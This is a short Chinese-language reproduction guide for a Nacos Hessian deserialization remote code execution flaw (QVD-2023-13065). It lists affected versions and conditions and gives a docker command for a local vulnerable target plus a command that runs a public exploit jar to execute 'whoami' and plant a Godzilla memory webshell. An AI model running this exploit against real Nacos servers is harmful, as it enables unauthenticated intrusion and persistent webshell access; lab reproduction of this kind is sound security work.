Nacos 反序列化RCE(QVD-2023-13065)
漏洞介绍
在Nacos集群处理部分Jraft请求时,攻击者可以无限制使用 hessian
进行反序列化利用,最终实现代码执行。
Nacos 1.4.1+在单机模式下默认不开放7848端口,故该情况通常不受此漏洞影响。然而,1.4.0、2.x版本无论单机或集群模式均默认开放7848端口。
影响范围
影响版本:
1.4.0 <= Nacos < 1.4.6
2.0.0 <= Nacos < 2.2.3
利用条件
目标机器开放 8848、7848 端口即可,无需控制台权限。
复现步骤
利用工具:c0olw/NacosRce: Nacos JRaft Hessian 反序列化 RCE 加载字节码 注入内存马 不出网利用 (github.com)
Docker 搭建靶场:
docker run --name nacos -e MODE=standalone -p 8848:8848 -p 7848:7848 -d nacos/nacos-server:v2.2.2
工具执行:
java -jar NacosRce.jar http://127.0.0.1:8848/nacos 7848 "whoami"
根据说明连接哥斯拉:
其他类型的内存马根据说明连接即可。